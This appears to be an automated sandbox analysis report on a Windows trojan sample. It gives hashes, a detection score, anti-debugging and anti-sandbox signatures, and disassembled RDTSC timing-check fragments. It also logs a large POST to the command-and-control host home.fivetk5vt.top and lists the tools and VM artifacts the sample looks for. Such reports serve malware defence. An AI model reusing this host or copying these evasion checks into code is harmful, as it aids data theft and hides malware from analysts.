Windows Analysis Report
28PCC9oa8s.exe

Overview

General Information

Sample name: 28PCC9oa8s.exe
renamed because original name is a hash value
Original sample name: 8a549f15d1418fb4207aadb4ba813a36.exe
Analysis ID: 1578970
MD5: 8a549f15d1418fb4207aadb4ba813a36
SHA1: 9019f532acc00096055788d1212842e8bec35627
SHA256: 7dc314359cdb76163923b61fc91175c7a09577e37443ca9711ba9c6b33863391
Tags: exe, user-abuse_ch
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files

Classification

  • System is w10x64
  • 28PCC9oa8s.exe (PID: 7672 cmdline: "C:\Users\user\Desktop\28PCC9oa8s.exe" MD5: 8A549F15D1418FB4207AADB4BA813A36)
    • WerFault.exe (PID: 8064 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7672 -s 1144 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: 28PCC9oa8s.exeAvira: detected
Source: 28PCC9oa8s.exeReversingLabs: Detection: 65%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: 28PCC9oa8s.exeJoe Sandbox ML: detected
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_d8a7d1ca-2
Source: 28PCC9oa8s.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: */*Content-Type: application/jsonContent-Length: 444875
Source: global trafficHTTP traffic detected: GET /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: */*
Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox ViewIP Address: 98.85.100.80 98.85.100.80
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fivetk5vt.top
Source: unknownHTTP traffic detected: POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: */*Content-Type: application/jsonContent-Length: 444875
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: 28PCC9oa8s.exe, 00000000.00000002.1714643297.0000000006E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzX
Source: 28PCC9oa8s.exe, 00000000.00000002.1714643297.0000000006E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXdA
Source: 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ17
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000002.1712666918.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, 28PCC9oa8s.exe, 00000000.00000002.1712590265.000000000144E000.00000004.00000020.00020000.00000000.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1610565392.00000000014D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745
Source: 28PCC9oa8s.exe, 00000000.00000002.1712590265.000000000144E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ173451474535a1
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtO
Source: 28PCC9oa8s.exe, 00000000.00000002.1712590265.000000000144E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745lse
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
Source: 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1336590433.0000000001497000.00000004.00000020.00020000.00000000.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701

System Summary

Source: 28PCC9oa8s.exeStatic PE information: section name:
Source: 28PCC9oa8s.exeStatic PE information: section name: .idata
Source: 28PCC9oa8s.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\28PCC9oa8s.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7672 -s 1144
Source: 28PCC9oa8s.exeStatic PE information: Section: souunsyz ZLIB complexity 0.9948484726974622
Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@10/2
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7672
Source: C:\Users\user\Desktop\28PCC9oa8s.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\1721fbd3-0ead-4257-905f-01e1835e0f2e
Source: C:\Users\user\Desktop\28PCC9oa8s.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\28PCC9oa8s.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: 28PCC9oa8s.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknownProcess created: C:\Users\user\Desktop\28PCC9oa8s.exe "C:\Users\user\Desktop\28PCC9oa8s.exe"
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: winmm.dll
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: cryptbase.dll
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: cryptsp.dll
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: rsaenh.dll
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: dnsapi.dll
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: napinsp.dll
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: wshbth.dll
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: nlaapi.dll
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: mswsock.dll
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: windows.storage.dll
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: windowscodecs.dll
Source: 28PCC9oa8s.exeStatic file information: File size 4450816 > 1048576
Source: 28PCC9oa8s.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x284800
Source: 28PCC9oa8s.exeStatic PE information: Raw size of souunsyz is bigger than: 0x100000 < 0x1b6600

Data Obfuscation

Source: C:\Users\user\Desktop\28PCC9oa8s.exeUnpacked PE file: 0.2.28PCC9oa8s.exe.b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;souunsyz:EW;zkkgfegk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;souunsyz:EW;zkkgfegk:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: 28PCC9oa8s.exeStatic PE information: real checksum: 0x449815 should be: 0x446a5c
Source: 28PCC9oa8s.exeStatic PE information: section name:
Source: 28PCC9oa8s.exeStatic PE information: section name: .idata
Source: 28PCC9oa8s.exeStatic PE information: section name:
Source: 28PCC9oa8s.exeStatic PE information: section name: souunsyz
Source: 28PCC9oa8s.exeStatic PE information: section name: zkkgfegk
Source: 28PCC9oa8s.exeStatic PE information: section name: .taggant
Source: 28PCC9oa8s.exeStatic PE information: section name: souunsyz entropy: 7.9567248280767044

Boot Survival

Source: C:\Users\user\Desktop\28PCC9oa8s.exeWindow searched: window name: FilemonClass
Source: C:\Users\user\Desktop\28PCC9oa8s.exeWindow searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\28PCC9oa8s.exeWindow searched: window name: RegmonClass
Source: C:\Users\user\Desktop\28PCC9oa8s.exeWindow searched: window name: Regmonclass
Source: C:\Users\user\Desktop\28PCC9oa8s.exeWindow searched: window name: Filemonclass
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\28PCC9oa8s.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\28PCC9oa8s.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9098EC second address: 9098F6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F98351AAB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9098F6 second address: 909900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F9834D75046h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 909900 second address: 90990E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90A856 second address: 90A860 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9834D75046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90990E second address: 909912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90B657 second address: 90B65C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90A860 second address: 90A877 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90B65C second address: 90B661 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90A877 second address: 90A8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jmp 00007F98351AAB29h 0x0000000b pop eax 0x0000000c popad 0x0000000d nop 0x0000000e mov bh, 84h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 jmp 00007F98351AAB1Ah 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov dword ptr [ebp+122D24B5h], edx 0x00000029 mov eax, dword ptr [ebp+122D14C9h] 0x0000002f mov dword ptr [ebp+1247E1B6h], ecx 0x00000035 push FFFFFFFFh 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F98351AAB18h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 00000015h 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 mov bh, 3Eh 0x00000053 push eax 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 pop eax 0x00000059 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90B661 second address: 90B684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F9834D75055h 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90C5AD second address: 90C5B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90C5B2 second address: 90C636 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9834D75048h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D256Dh], ebx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F9834D75048h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 and bx, 8622h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007F9834D75048h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 0000001Ah 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 mov ebx, dword ptr [ebp+122D3932h] 0x00000058 xchg eax, esi 0x00000059 jmp 00007F9834D75057h 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 push esi 0x00000064 pop esi 0x00000065 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90C636 second address: 90C63C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90C63C second address: 90C646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F9834D75046h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90C807 second address: 90C80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90C80D second address: 90C811 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90F60A second address: 90F650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F98351AAB1Ah 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov bh, 61h 0x00000010 push 00000000h 0x00000012 jo 00007F98351AAB18h 0x00000018 mov ebx, esi 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007F98351AAB18h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 push eax 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b pop eax 0x0000003c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90F650 second address: 90F669 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90C904 second address: 90C90A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 91059C second address: 9105A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9105A0 second address: 910601 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnp 00007F98351AAB1Ch 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 popad 0x00000015 nop 0x00000016 sub dword ptr [ebp+122D1FBFh], eax 0x0000001c push 00000000h 0x0000001e sub dword ptr [ebp+122D256Dh], esi 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007F98351AAB18h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 00000017h 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 xor dword ptr [ebp+122D1881h], edx 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 jmp 00007F98351AAB1Bh 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 910601 second address: 910617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F9834D7504Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9125B9 second address: 9125C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98351AAB1Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9144C0 second address: 9144E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75056h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F9834D75046h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9144E2 second address: 91451B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F98351AAB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e sub dword ptr [ebp+122D24E2h], ebx 0x00000014 push 00000000h 0x00000016 or ebx, dword ptr [ebp+122D3C43h] 0x0000001c push 00000000h 0x0000001e call 00007F98351AAB1Ch 0x00000023 jne 00007F98351AAB18h 0x00000029 pop edi 0x0000002a cld 0x0000002b xchg eax, esi 0x0000002c pushad 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 91451B second address: 914524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 914524 second address: 914528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90D969 second address: 90D96E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90D96E second address: 90D974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9194A3 second address: 9194A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 919EEA second address: 919EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 919EEE second address: 919EF8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9834D75046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 919EF8 second address: 919F0E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F98351AAB1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 919F0E second address: 919F12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 919F12 second address: 919F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 919F1B second address: 919F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90E85D second address: 90E861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 91D551 second address: 91D555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 91D555 second address: 91D559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
